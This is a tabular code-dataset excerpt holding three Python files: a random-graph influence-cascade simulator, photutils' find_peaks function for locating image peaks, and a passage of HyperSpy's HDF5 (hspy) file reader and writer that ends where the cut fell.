repo_name (string, len 5-92) | path (string, len 4-232) | copies (string, 19 classes) | size (string, len 4-7) | content (string, len 721-1.04M) | license (string, 15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
yuikns/pattern-counter | data/dataset/ER_middle/generate_graph.py | 1 | 1801 | import random as ran
import networkx as nx
import Queue
import matplotlib.pyplot as plt
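# Overview (comments added for clarity): this script builds an Erdos-Renyi
# random graph, simulates a simple influence cascade from a random seed node
# using a BFS queue, labels each node with the time steps at which it was
# activated, and writes the graph, a node dictionary and the activation logs
# to graph.txt, node_dict.txt and logs.txt.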
n=150 # number of nodes
p=0.1 # edge selection probability
G=nx.erdos_renyi_graph(n,p)
print "#nodes = ", G.number_of_nodes()
print "#edges = ", G.number_of_edges()
L=1000 # number of logs
influence_probability = 0.35 # activity probability
seed_id = ran.randint(0,n-1)
q = Queue.Queue()
l = 0
q.put((seed_id,0))
G.node[seed_id]['label'] = '0'
logs = []
logs.append((seed_id, 0))
while(not q.empty() and l < L):
l+=1
(node_id, t) = q.get()
neighbors = G.neighbors(node_id)
if len(neighbors) == 0:
node_id = ran.randint(0,n-1)
if G.node[node_id].get('label') != None:
G.node[node_id]['label'] = G.node[node_id].get('label')+"-"+str(t+1)
else:
G.node[node_id]['label'] = str(t+1)
q.put((node_id, t+1))
logs.append((node_id, t+1))
print len(logs)
else:
for neighbor_id in neighbors:
x = ran.random()
if x <= influence_probability:
if G.node[neighbor_id].get('label') != None:
G.node[neighbor_id]['label'] = G.node[neighbor_id].get('label')+"-"+str(t+1)
else:
G.node[neighbor_id]['label'] = str(t+1)
q.put((neighbor_id, t+1))
logs.append((neighbor_id, t+1))
for i in range(G.number_of_nodes()):
print i, " ", G.node[i].get('label')
f = open("graph.txt","w")
f.write(str(G.number_of_nodes())+"\t"+str(G.number_of_edges())+"\n")
for edge in G.edges():
f.write(str(edge[0])+"\t"+str(edge[1])+"\t1.0\n")
f.close()
f = open("node_dict.txt", "w")
for node in range(n):
f.write(str(node)+"\t"+str(node)+"\n")
f.close()
print "#logs = ", len(logs)
f = open("logs.txt", "w")
for log in logs:
f.write(str(log[0])+"\t"+str(log[1])+"\n")
f.close()
nx.draw(G, with_labels=True)
# nx.draw_networkx_labels(G,pos=nx.spring_layout(G))
plt.show()
| mit | -1,865,508,281,380,050,700 | 25.101449 | 82 | 0.609661 | false |
astropy/photutils | photutils/detection/peakfinder.py | 1 | 7745 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module provides tools for finding local peaks in an astronomical
image.
"""
import warnings
from astropy.table import Table
import numpy as np
from ..utils.exceptions import NoDetectionsWarning
__all__ = ['find_peaks']
def find_peaks(data, threshold, box_size=3, footprint=None, mask=None,
border_width=None, npeaks=np.inf, centroid_func=None,
error=None, wcs=None):
"""
Find local peaks in an image that are above a specified
threshold value.
Peaks are the maxima above the ``threshold`` within a local region.
The local regions are defined by either the ``box_size`` or
``footprint`` parameters. ``box_size`` defines the local region
around each pixel as a square box. ``footprint`` is a boolean array
where `True` values specify the region shape.
If multiple pixels within a local region have identical intensities,
then the coordinates of all such pixels are returned. Otherwise,
there will be only one peak pixel per local region. Thus, the
defined region effectively imposes a minimum separation between
peaks unless there are identical peaks within the region.
If ``centroid_func`` is input, then it will be used to calculate a
centroid within the defined local region centered on each detected
peak pixel. In this case, the centroid will also be returned in the
output table.
Parameters
----------
data : array_like
The 2D array of the image.
threshold : float or array-like
The data value or pixel-wise data values to be used for the
detection threshold. A 2D ``threshold`` must have the same shape
as ``data``. See `~photutils.segmentation.detect_threshold` for
one way to create a ``threshold`` image.
box_size : scalar or tuple, optional
The size of the local region to search for peaks at every point
in ``data``. If ``box_size`` is a scalar, then the region shape
will be ``(box_size, box_size)``. Either ``box_size`` or
``footprint`` must be defined. If they are both defined, then
``footprint`` overrides ``box_size``.
footprint : `~numpy.ndarray` of bools, optional
A boolean array where `True` values describe the local footprint
region within which to search for peaks at every point in
``data``. ``box_size=(n, m)`` is equivalent to
``footprint=np.ones((n, m))``. Either ``box_size`` or
``footprint`` must be defined. If they are both defined, then
``footprint`` overrides ``box_size``.
mask : array_like, bool, optional
A boolean mask with the same shape as ``data``, where a `True`
value indicates the corresponding element of ``data`` is masked.
border_width : int, optional
The width in pixels to exclude around the border of the
``data``.
npeaks : int, optional
The maximum number of peaks to return. When the number of
detected peaks exceeds ``npeaks``, the peaks with the highest
peak intensities will be returned.
centroid_func : callable, optional
A callable object (e.g., function or class) that is used to
calculate the centroid of a 2D array. The ``centroid_func``
must accept a 2D `~numpy.ndarray`, have a ``mask`` keyword, and
optionally an ``error`` keyword. The callable object must return
a tuple of two 1D `~numpy.ndarray`\\s, representing the x and y
centroids, respectively.
error : array_like, optional
The 2D array of the 1-sigma errors of the input ``data``.
``error`` is used only if ``centroid_func`` is input (the
``error`` array is passed directly to the ``centroid_func``).
wcs : `None` or WCS object, optional
A world coordinate system (WCS) transformation that
supports the `astropy shared interface for WCS
<https://docs.astropy.org/en/stable/wcs/wcsapi.html>`_
(e.g., `astropy.wcs.WCS`, `gwcs.wcs.WCS`). If `None`, then
the sky coordinates will not be returned in the output
`~astropy.table.Table`.
Returns
-------
output : `~astropy.table.Table` or `None`
A table containing the x and y pixel location of the peaks and
their values. If ``centroid_func`` is input, then the table
will also contain the centroid position. If no peaks are found
then `None` is returned.
"""
from scipy.ndimage import maximum_filter
data = np.asanyarray(data)
if np.all(data == data.flat[0]):
warnings.warn('Input data is constant. No local peaks can be found.',
NoDetectionsWarning)
return None
if not np.isscalar(threshold):
threshold = np.asanyarray(threshold)
if data.shape != threshold.shape:
raise ValueError('A threshold array must have the same shape as '
'the input data.')
# remove NaN values to avoid runtime warnings
nan_mask = np.isnan(data)
if np.any(nan_mask):
data = np.copy(data) # ndarray
data[nan_mask] = np.nanmin(data)
if footprint is not None:
data_max = maximum_filter(data, footprint=footprint, mode='constant',
cval=0.0)
else:
data_max = maximum_filter(data, size=box_size, mode='constant',
cval=0.0)
peak_goodmask = (data == data_max) # good pixels are True
if mask is not None:
mask = np.asanyarray(mask)
if data.shape != mask.shape:
raise ValueError('data and mask must have the same shape')
peak_goodmask = np.logical_and(peak_goodmask, ~mask)
if border_width is not None:
for i in range(peak_goodmask.ndim):
peak_goodmask = peak_goodmask.swapaxes(0, i)
peak_goodmask[:border_width] = False
peak_goodmask[-border_width:] = False
peak_goodmask = peak_goodmask.swapaxes(0, i)
peak_goodmask = np.logical_and(peak_goodmask, (data > threshold))
y_peaks, x_peaks = peak_goodmask.nonzero()
peak_values = data[y_peaks, x_peaks]
nxpeaks = len(x_peaks)
if nxpeaks > npeaks:
idx = np.argsort(peak_values)[::-1][:npeaks]
x_peaks = x_peaks[idx]
y_peaks = y_peaks[idx]
peak_values = peak_values[idx]
if nxpeaks == 0:
warnings.warn('No local peaks were found.', NoDetectionsWarning)
return None
# construct the output Table
colnames = ['x_peak', 'y_peak', 'peak_value']
coldata = [x_peaks, y_peaks, peak_values]
table = Table(coldata, names=colnames)
if wcs is not None:
skycoord_peaks = wcs.pixel_to_world(x_peaks, y_peaks)
table.add_column(skycoord_peaks, name='skycoord_peak', index=2)
# perform centroiding
if centroid_func is not None:
from ..centroids import centroid_sources # prevents circular import
if not callable(centroid_func):
raise TypeError('centroid_func must be a callable object')
x_centroids, y_centroids = centroid_sources(
data, x_peaks, y_peaks, box_size=box_size,
footprint=footprint, error=error, mask=mask,
centroid_func=centroid_func)
table['x_centroid'] = x_centroids
table['y_centroid'] = y_centroids
if wcs is not None:
skycoord_centroids = wcs.pixel_to_world(x_centroids, y_centroids)
idx = table.colnames.index('y_centroid') + 1
table.add_column(skycoord_centroids, name='skycoord_centroid',
index=idx)
return table
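# Illustrative usage sketch (not part of the original module); the helper name
# ``_example_find_peaks`` is hypothetical and it assumes the module is
# importable as part of an installed photutils package.
def _example_find_peaks():
    # Build a flat noisy image and inject two bright pixels.
    rng = np.random.default_rng(0)
    image = rng.normal(size=(50, 50))
    image[10, 12] += 20.0
    image[30, 40] += 25.0
    # Peaks are local maxima above ``threshold`` within a 5x5 box.
    return find_peaks(image, threshold=10.0, box_size=5)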
| bsd-3-clause | 3,252,517,488,236,389,400 | 38.116162 | 77 | 0.634732 | false |
ericpre/hyperspy | hyperspy/io_plugins/hspy.py | 1 | 31796 | # -*- coding: utf-8 -*-
# Copyright 2007-2021 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
from distutils.version import LooseVersion
import warnings
import logging
import datetime
import ast
import h5py
import numpy as np
import dask.array as da
from traits.api import Undefined
from hyperspy.misc.utils import ensure_unicode, multiply, get_object_package_info
from hyperspy.axes import AxesManager
_logger = logging.getLogger(__name__)
# Plugin characteristics
# ----------------------
format_name = 'HSPY'
description = \
'The default file format for HyperSpy based on the HDF5 standard'
full_support = False
# Recognised file extension
file_extensions = ['hspy', 'hdf5']
default_extension = 0
# Writing capabilities
writes = True
version = "3.1"
# -----------------------
# File format description
# -----------------------
# The root must contain a group called Experiments
# The experiments group can contain any number of subgroups
# Each subgroup is an experiment or signal
# Each subgroup must contain at least one dataset called data
# The data is an array of arbitrary dimension
# In addition a number equal to the number of dimensions of the data
# dataset + 1 of empty groups called coordinates followed by a number
# must exists with the following attributes:
# 'name'
# 'offset'
# 'scale'
# 'units'
# 'size'
# 'index_in_array'
# The experiment group contains a number of attributes that will be
# directly assigned as class attributes of the Signal instance. In
# addition the experiment groups may contain 'original_metadata' and
# 'metadata'subgroup that will be
# assigned to the same name attributes of the Signal instance as a
# Dictionary Browsers
# The Experiments group can contain attributes that may be common to all
# the experiments and that will be accessible as attributes of the
# Experiments instance
#
# CHANGES
#
# v3.1
# - move metadata.Signal.binned attribute to axes.is_binned parameter
#
# v3.0
# - add Camera and Stage node
# - move tilt_stage to Stage.tilt_alpha
#
# v2.2
# - store more metadata as string: date, time, notes, authors and doi
# - store quantity for intensity axis
#
# v2.1
# - Store the navigate attribute.
# - record_by is stored only for backward compatibility but the axes navigate
# attribute takes precedence over record_by for files with version >= 2.1
# v1.3
# ----
# - Added support for lists, tuples and binary strings
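# Illustrative sketch of the layout described above (not part of the original
# module): a small helper that walks an existing .hspy file and prints each
# experiment's data shape and axis attributes. The helper name is hypothetical
# and ``path`` is assumed to point to a file written by this plugin.
def _sketch_print_hspy_layout(path):
    with h5py.File(path, mode='r') as f:
        for name, exp in f['Experiments'].items():
            print(name, exp['data'].shape)
            i = 0
            while 'axis-%i' % i in exp:
                print('  axis-%i' % i, dict(exp['axis-%i' % i].attrs))
                i += 1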
not_valid_format = 'The file is not a valid HyperSpy hdf5 file'
current_file_version = None # Format version of the file being read
default_version = LooseVersion(version)
def get_hspy_format_version(f):
if "file_format_version" in f.attrs:
version = f.attrs["file_format_version"]
if isinstance(version, bytes):
version = version.decode()
if isinstance(version, float):
version = str(round(version, 2))
elif "Experiments" in f:
# Chances are that this is a HSpy hdf5 file version 1.0
version = "1.0"
elif "Analysis" in f:
# Starting version 2.0 we have "Analysis" field as well
version = "2.0"
else:
raise IOError(not_valid_format)
return LooseVersion(version)
def file_reader(filename, backing_store=False,
lazy=False, **kwds):
"""Read data from hdf5 files saved with the hyperspy hdf5 format specification
Parameters
----------
filename: str
lazy: bool
Load image lazily using dask
**kwds, optional
"""
try:
# in case blosc compression is used
import hdf5plugin
except ImportError:
pass
mode = kwds.pop('mode', 'r')
f = h5py.File(filename, mode=mode, **kwds)
# Getting the format version here also checks if it is a valid HSpy
# hdf5 file, so the following two lines must not be deleted or moved
# elsewhere.
global current_file_version
current_file_version = get_hspy_format_version(f)
global default_version
if current_file_version > default_version:
warnings.warn(
"This file was written using a newer version of the "
"HyperSpy hdf5 file format. I will attempt to load it, but, "
"if I fail, it is likely that I will be more successful at "
"this and other tasks if you upgrade me.")
models_with_signals = []
standalone_models = []
if 'Analysis/models' in f:
try:
m_gr = f.require_group('Analysis/models')
for model_name in m_gr:
if '_signal' in m_gr[model_name].attrs:
key = m_gr[model_name].attrs['_signal']
# del m_gr[model_name].attrs['_signal']
res = hdfgroup2dict(
m_gr[model_name],
lazy=lazy)
del res['_signal']
models_with_signals.append((key, {model_name: res}))
else:
standalone_models.append(
{model_name: hdfgroup2dict(
m_gr[model_name], lazy=lazy)})
except TypeError:
raise IOError(not_valid_format)
experiments = []
exp_dict_list = []
if 'Experiments' in f:
for ds in f['Experiments']:
if isinstance(f['Experiments'][ds], h5py.Group):
if 'data' in f['Experiments'][ds]:
experiments.append(ds)
# Parse the file
for experiment in experiments:
exg = f['Experiments'][experiment]
exp = hdfgroup2signaldict(exg, lazy)
# assign correct models, if found:
_tmp = {}
for (key, _dict) in reversed(models_with_signals):
if key == exg.name:
_tmp.update(_dict)
models_with_signals.remove((key, _dict))
exp['models'] = _tmp
exp_dict_list.append(exp)
for _, m in models_with_signals:
standalone_models.append(m)
exp_dict_list.extend(standalone_models)
if not len(exp_dict_list):
raise IOError('This is not a valid HyperSpy HDF5 file. '
'You can still load the data using a hdf5 reader, '
'e.g. h5py, and manually create a Signal. '
'Please, refer to the User Guide for details')
if not lazy:
f.close()
return exp_dict_list
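# Usage sketch (illustrative, not part of the original module): turning the
# dictionaries returned by ``file_reader`` into a signal object. The helper
# name is hypothetical and it assumes HyperSpy is installed.
def _example_read_hspy(filename):
    from hyperspy.io import dict2signal
    # With lazy=True the HDF5 file is kept open and ``data`` is a dask array.
    exp_dicts = file_reader(filename, lazy=True)
    # The first entry is an experiment dictionary; the list may also contain
    # standalone model dictionaries, which are not signals.
    return dict2signal(exp_dicts[0])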
def hdfgroup2signaldict(group, lazy=False):
global current_file_version
global default_version
if current_file_version < LooseVersion("1.2"):
metadata = "mapped_parameters"
original_metadata = "original_parameters"
else:
metadata = "metadata"
original_metadata = "original_metadata"
exp = {'metadata': hdfgroup2dict(
group[metadata], lazy=lazy),
'original_metadata': hdfgroup2dict(
group[original_metadata], lazy=lazy),
'attributes': {}
}
if "package" in group.attrs:
# HyperSpy version is >= 1.5
exp["package"] = group.attrs["package"]
exp["package_version"] = group.attrs["package_version"]
else:
# Prior to v1.4 we didn't store the package information. Since there
# were already external packages we cannot assume any package provider, so
# we leave this empty.
exp["package"] = ""
exp["package_version"] = ""
data = group['data']
if lazy:
data = da.from_array(data, chunks=data.chunks)
exp['attributes']['_lazy'] = True
else:
data = np.asanyarray(data)
exp['data'] = data
axes = []
for i in range(len(exp['data'].shape)):
try:
axes.append(dict(group['axis-%i' % i].attrs))
axis = axes[-1]
for key, item in axis.items():
if isinstance(item, np.bool_):
axis[key] = bool(item)
else:
axis[key] = ensure_unicode(item)
except KeyError:
break
if len(axes) != len(exp['data'].shape): # broke from the previous loop
try:
axes = [i for k, i in sorted(iter(hdfgroup2dict(
group['_list_' + str(len(exp['data'].shape)) + '_axes'],
lazy=lazy).items()))]
except KeyError:
raise IOError(not_valid_format)
exp['axes'] = axes
if 'learning_results' in group.keys():
exp['attributes']['learning_results'] = \
hdfgroup2dict(
group['learning_results'],
lazy=lazy)
if 'peak_learning_results' in group.keys():
exp['attributes']['peak_learning_results'] = \
hdfgroup2dict(
group['peak_learning_results'],
lazy=lazy)
# If the title was not defined on writing the Experiment is
# then called __unnamed__. The next "if" simply sets the title
# back to the empty string
if "General" in exp["metadata"] and "title" in exp["metadata"]["General"]:
if '__unnamed__' == exp['metadata']['General']['title']:
exp['metadata']["General"]['title'] = ''
if current_file_version < LooseVersion("1.1"):
# Load the decomposition results written with the old name,
# mva_results
if 'mva_results' in group.keys():
exp['attributes']['learning_results'] = hdfgroup2dict(
group['mva_results'], lazy=lazy)
if 'peak_mva_results' in group.keys():
exp['attributes']['peak_learning_results'] = hdfgroup2dict(
group['peak_mva_results'], lazy=lazy)
# Replace the old signal and name keys with their current names
if 'signal' in exp['metadata']:
if "Signal" not in exp["metadata"]:
exp["metadata"]["Signal"] = {}
exp['metadata']["Signal"]['signal_type'] = \
exp['metadata']['signal']
del exp['metadata']['signal']
if 'name' in exp['metadata']:
if "General" not in exp["metadata"]:
exp["metadata"]["General"] = {}
exp['metadata']['General']['title'] = \
exp['metadata']['name']
del exp['metadata']['name']
if current_file_version < LooseVersion("1.2"):
if '_internal_parameters' in exp['metadata']:
exp['metadata']['_HyperSpy'] = \
exp['metadata']['_internal_parameters']
del exp['metadata']['_internal_parameters']
if 'stacking_history' in exp['metadata']['_HyperSpy']:
exp['metadata']['_HyperSpy']["Stacking_history"] = \
exp['metadata']['_HyperSpy']['stacking_history']
del exp['metadata']['_HyperSpy']["stacking_history"]
if 'folding' in exp['metadata']['_HyperSpy']:
exp['metadata']['_HyperSpy']["Folding"] = \
exp['metadata']['_HyperSpy']['folding']
del exp['metadata']['_HyperSpy']["folding"]
if 'Variance_estimation' in exp['metadata']:
if "Noise_properties" not in exp["metadata"]:
exp["metadata"]["Noise_properties"] = {}
exp['metadata']['Noise_properties']["Variance_linear_model"] = \
exp['metadata']['Variance_estimation']
del exp['metadata']['Variance_estimation']
if "TEM" in exp["metadata"]:
if "Acquisition_instrument" not in exp["metadata"]:
exp["metadata"]["Acquisition_instrument"] = {}
exp["metadata"]["Acquisition_instrument"]["TEM"] = \
exp["metadata"]["TEM"]
del exp["metadata"]["TEM"]
tem = exp["metadata"]["Acquisition_instrument"]["TEM"]
if "EELS" in tem:
if "dwell_time" in tem:
tem["EELS"]["dwell_time"] = tem["dwell_time"]
del tem["dwell_time"]
if "dwell_time_units" in tem:
tem["EELS"]["dwell_time_units"] = tem["dwell_time_units"]
del tem["dwell_time_units"]
if "exposure" in tem:
tem["EELS"]["exposure"] = tem["exposure"]
del tem["exposure"]
if "exposure_units" in tem:
tem["EELS"]["exposure_units"] = tem["exposure_units"]
del tem["exposure_units"]
if "Detector" not in tem:
tem["Detector"] = {}
tem["Detector"] = tem["EELS"]
del tem["EELS"]
if "EDS" in tem:
if "Detector" not in tem:
tem["Detector"] = {}
if "EDS" not in tem["Detector"]:
tem["Detector"]["EDS"] = {}
tem["Detector"]["EDS"] = tem["EDS"]
del tem["EDS"]
del tem
if "SEM" in exp["metadata"]:
if "Acquisition_instrument" not in exp["metadata"]:
exp["metadata"]["Acquisition_instrument"] = {}
exp["metadata"]["Acquisition_instrument"]["SEM"] = \
exp["metadata"]["SEM"]
del exp["metadata"]["SEM"]
sem = exp["metadata"]["Acquisition_instrument"]["SEM"]
if "EDS" in sem:
if "Detector" not in sem:
sem["Detector"] = {}
if "EDS" not in sem["Detector"]:
sem["Detector"]["EDS"] = {}
sem["Detector"]["EDS"] = sem["EDS"]
del sem["EDS"]
del sem
if "Sample" in exp["metadata"] and "Xray_lines" in exp[
"metadata"]["Sample"]:
exp["metadata"]["Sample"]["xray_lines"] = exp[
"metadata"]["Sample"]["Xray_lines"]
del exp["metadata"]["Sample"]["Xray_lines"]
for key in ["title", "date", "time", "original_filename"]:
if key in exp["metadata"]:
if "General" not in exp["metadata"]:
exp["metadata"]["General"] = {}
exp["metadata"]["General"][key] = exp["metadata"][key]
del exp["metadata"][key]
for key in ["record_by", "signal_origin", "signal_type"]:
if key in exp["metadata"]:
if "Signal" not in exp["metadata"]:
exp["metadata"]["Signal"] = {}
exp["metadata"]["Signal"][key] = exp["metadata"][key]
del exp["metadata"][key]
if current_file_version < LooseVersion("3.0"):
if "Acquisition_instrument" in exp["metadata"]:
# Move tilt_stage to Stage.tilt_alpha
# Move exposure time to Detector.Camera.exposure_time
if "TEM" in exp["metadata"]["Acquisition_instrument"]:
tem = exp["metadata"]["Acquisition_instrument"]["TEM"]
exposure = None
if "tilt_stage" in tem:
tem["Stage"] = {"tilt_alpha": tem["tilt_stage"]}
del tem["tilt_stage"]
if "exposure" in tem:
exposure = "exposure"
# Digital_micrograph plugin was parsing to 'exposure_time'
# instead of 'exposure': need this to be compatible with
# previous behaviour
if "exposure_time" in tem:
exposure = "exposure_time"
if exposure is not None:
if "Detector" not in tem:
tem["Detector"] = {"Camera": {
"exposure": tem[exposure]}}
tem["Detector"]["Camera"] = {"exposure": tem[exposure]}
del tem[exposure]
# Move tilt_stage to Stage.tilt_alpha
if "SEM" in exp["metadata"]["Acquisition_instrument"]:
sem = exp["metadata"]["Acquisition_instrument"]["SEM"]
if "tilt_stage" in sem:
sem["Stage"] = {"tilt_alpha": sem["tilt_stage"]}
del sem["tilt_stage"]
return exp
def dict2hdfgroup(dictionary, group, **kwds):
"Recursive writer of dicts and signals"
from hyperspy.misc.utils import DictionaryTreeBrowser
from hyperspy.signal import BaseSignal
def parse_structure(key, group, value, _type, **kwds):
try:
# Here we check if there are any signals in the container, as
# casting a long list of signals to a numpy array takes a very long
# time. So we check if there are any, and save numpy the trouble
if np.any([isinstance(t, BaseSignal) for t in value]):
tmp = np.array([[0]])
else:
tmp = np.array(value)
except ValueError:
tmp = np.array([[0]])
if tmp.dtype == np.dtype('O') or tmp.ndim != 1:
dict2hdfgroup(dict(zip(
[str(i) for i in range(len(value))], value)),
group.create_group(_type + str(len(value)) + '_' + key),
**kwds)
elif tmp.dtype.type is np.unicode_:
if _type + key in group:
del group[_type + key]
group.create_dataset(_type + key,
tmp.shape,
dtype=h5py.special_dtype(vlen=str),
**kwds)
group[_type + key][:] = tmp[:]
else:
if _type + key in group:
del group[_type + key]
group.create_dataset(
_type + key,
data=tmp,
**kwds)
for key, value in dictionary.items():
if isinstance(value, dict):
dict2hdfgroup(value, group.create_group(key),
**kwds)
elif isinstance(value, DictionaryTreeBrowser):
dict2hdfgroup(value.as_dictionary(),
group.create_group(key),
**kwds)
elif isinstance(value, BaseSignal):
kn = key if key.startswith('_sig_') else '_sig_' + key
write_signal(value, group.require_group(kn))
elif isinstance(value, (np.ndarray, h5py.Dataset, da.Array)):
overwrite_dataset(group, value, key, **kwds)
elif value is None:
group.attrs[key] = '_None_'
elif isinstance(value, bytes):
try:
# binary string if it has any null characters (otherwise not
# supported by hdf5)
value.index(b'\x00')
group.attrs['_bs_' + key] = np.void(value)
except ValueError:
group.attrs[key] = value.decode()
elif isinstance(value, str):
group.attrs[key] = value
elif isinstance(value, AxesManager):
dict2hdfgroup(value.as_dictionary(),
group.create_group('_hspy_AxesManager_' + key),
**kwds)
elif isinstance(value, list):
if len(value):
parse_structure(key, group, value, '_list_', **kwds)
else:
group.attrs['_list_empty_' + key] = '_None_'
elif isinstance(value, tuple):
if len(value):
parse_structure(key, group, value, '_tuple_', **kwds)
else:
group.attrs['_tuple_empty_' + key] = '_None_'
elif value is Undefined:
continue
else:
try:
group.attrs[key] = value
except BaseException:
_logger.exception(
"The hdf5 writer could not write the following "
"information in the file: %s : %s", key, value)
def get_signal_chunks(shape, dtype, signal_axes=None):
"""Function that calculates chunks for the signal, preferably at least one
chunk per signal space.
Parameters
----------
shape : tuple
the shape of the dataset to be stored / chunked
dtype : {dtype, string}
the numpy dtype of the data
signal_axes: {None, iterable of ints}
the axes defining "signal space" of the dataset. If None, the default
h5py chunking is performed.
"""
typesize = np.dtype(dtype).itemsize
if signal_axes is None:
return h5py._hl.filters.guess_chunk(shape, None, typesize)
# largely based on the guess_chunk in h5py
CHUNK_MAX = 1024 * 1024
want_to_keep = multiply([shape[i] for i in signal_axes]) * typesize
if want_to_keep >= CHUNK_MAX:
chunks = [1 for _ in shape]
for i in signal_axes:
chunks[i] = shape[i]
return tuple(chunks)
chunks = [i for i in shape]
idx = 0
navigation_axes = tuple(i for i in range(len(shape)) if i not in
signal_axes)
nchange = len(navigation_axes)
while True:
chunk_bytes = multiply(chunks) * typesize
if chunk_bytes < CHUNK_MAX:
break
if multiply([chunks[i] for i in navigation_axes]) == 1:
break
change = navigation_axes[idx % nchange]
chunks[change] = np.ceil(chunks[change] / 2.0)
idx += 1
return tuple(int(x) for x in chunks)
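# Worked example (illustrative, not part of the original module): for a
# float32 dataset of shape (200, 200, 512, 512) with signal_axes=(2, 3), one
# signal frame alone needs 512 * 512 * 4 bytes = 1 MiB, which already reaches
# CHUNK_MAX, so whole signal frames are kept and the navigation axes collapse
# to single-element chunks:
#
#     get_signal_chunks((200, 200, 512, 512), "float32", signal_axes=(2, 3))
#     # -> (1, 1, 512, 512)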
def overwrite_dataset(group, data, key, signal_axes=None, chunks=None, **kwds):
if chunks is None:
if isinstance(data, da.Array):
# For lazy dataset, by default, we use the current dask chunking
chunks = tuple([c[0] for c in data.chunks])
else:
# If signal_axes=None, use automatic h5py chunking, otherwise
# optimise the chunking to contain at least one signal per chunk
chunks = get_signal_chunks(data.shape, data.dtype, signal_axes)
if np.issubdtype(data.dtype, np.dtype('U')):
# Saving numpy unicode type is not supported in h5py
data = data.astype(np.dtype('S'))
if data.dtype == np.dtype('O'):
# For saving ragged array
# http://docs.h5py.org/en/stable/special.html#arbitrary-vlen-data
group.require_dataset(key,
chunks,
dtype=h5py.special_dtype(vlen=data[0].dtype),
**kwds)
group[key][:] = data[:]
maxshape = tuple(None for _ in data.shape)
got_data = False
while not got_data:
try:
these_kwds = kwds.copy()
these_kwds.update(dict(shape=data.shape,
dtype=data.dtype,
exact=True,
maxshape=maxshape,
chunks=chunks,
shuffle=True,))
# If chunks is True, the `chunks` attribute of `dset` below
# contains the chunk shape guessed by h5py
dset = group.require_dataset(key, **these_kwds)
got_data = True
except TypeError:
# if the shape or dtype/etc do not match,
# we delete the old one and create new in the next loop run
del group[key]
if dset == data:
# just a reference to already created thing
pass
else:
_logger.info(f"Chunks used for saving: {dset.chunks}")
if isinstance(data, da.Array):
if data.chunks != dset.chunks:
data = data.rechunk(dset.chunks)
da.store(data, dset)
elif data.flags.c_contiguous:
dset.write_direct(data)
else:
dset[:] = data
def hdfgroup2dict(group, dictionary=None, lazy=False):
if dictionary is None:
dictionary = {}
for key, value in group.attrs.items():
if isinstance(value, bytes):
value = value.decode()
if isinstance(value, (np.string_, str)):
if value == '_None_':
value = None
elif isinstance(value, np.bool_):
value = bool(value)
elif isinstance(value, np.ndarray) and value.dtype.char == "S":
# Convert strings to unicode
value = value.astype("U")
if value.dtype.str.endswith("U1"):
value = value.tolist()
# skip signals - these are handled below.
if key.startswith('_sig_'):
pass
elif key.startswith('_list_empty_'):
dictionary[key[len('_list_empty_'):]] = []
elif key.startswith('_tuple_empty_'):
dictionary[key[len('_tuple_empty_'):]] = ()
elif key.startswith('_bs_'):
dictionary[key[len('_bs_'):]] = value.tobytes()
# The following two elif statements enable reading date and time from
# v < 2 of HyperSpy's metadata specifications
elif key.startswith('_datetime_date'):
date_iso = datetime.date(
*ast.literal_eval(value[value.index("("):])).isoformat()
dictionary[key.replace("_datetime_", "")] = date_iso
elif key.startswith('_datetime_time'):
date_iso = datetime.time(
*ast.literal_eval(value[value.index("("):])).isoformat()
dictionary[key.replace("_datetime_", "")] = date_iso
else:
dictionary[key] = value
if not isinstance(group, h5py.Dataset):
for key in group.keys():
if key.startswith('_sig_'):
from hyperspy.io import dict2signal
dictionary[key[len('_sig_'):]] = (
dict2signal(hdfgroup2signaldict(
group[key], lazy=lazy)))
elif isinstance(group[key], h5py.Dataset):
dat = group[key]
kn = key
if key.startswith("_list_"):
if (h5py.check_string_dtype(dat.dtype) and
hasattr(dat, 'asstr')):
# h5py 3.0 and newer
# https://docs.h5py.org/en/3.0.0/strings.html
dat = dat.asstr()[:]
ans = np.array(dat)
ans = ans.tolist()
kn = key[6:]
elif key.startswith("_tuple_"):
ans = np.array(dat)
ans = tuple(ans.tolist())
kn = key[7:]
elif dat.dtype.char == "S":
ans = np.array(dat)
try:
ans = ans.astype("U")
except UnicodeDecodeError:
# There are some strings that must stay in binary,
# for example dill pickles. This will obviously also
# let "wrong" binary string fail somewhere else...
pass
elif lazy:
ans = da.from_array(dat, chunks=dat.chunks)
else:
ans = np.array(dat)
dictionary[kn] = ans
elif key.startswith('_hspy_AxesManager_'):
dictionary[key[len('_hspy_AxesManager_'):]] = AxesManager(
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))])
elif key.startswith('_list_'):
dictionary[key[7 + key[6:].find('_'):]] = \
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))]
elif key.startswith('_tuple_'):
dictionary[key[8 + key[7:].find('_'):]] = tuple(
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))])
else:
dictionary[key] = {}
hdfgroup2dict(
group[key],
dictionary[key],
lazy=lazy)
return dictionary
def write_signal(signal, group, **kwds):
"Writes a hyperspy signal to a hdf5 group"
group.attrs.update(get_object_package_info(signal))
if default_version < LooseVersion("1.2"):
metadata = "mapped_parameters"
original_metadata = "original_parameters"
else:
metadata = "metadata"
original_metadata = "original_metadata"
if 'compression' not in kwds:
kwds['compression'] = 'gzip'
for axis in signal.axes_manager._axes:
axis_dict = axis.get_axis_dictionary()
coord_group = group.create_group(
'axis-%s' % axis.index_in_array)
dict2hdfgroup(axis_dict, coord_group, **kwds)
mapped_par = group.create_group(metadata)
metadata_dict = signal.metadata.as_dictionary()
overwrite_dataset(group, signal.data, 'data',
signal_axes=signal.axes_manager.signal_indices_in_array,
**kwds)
if default_version < LooseVersion("1.2"):
metadata_dict["_internal_parameters"] = \
metadata_dict.pop("_HyperSpy")
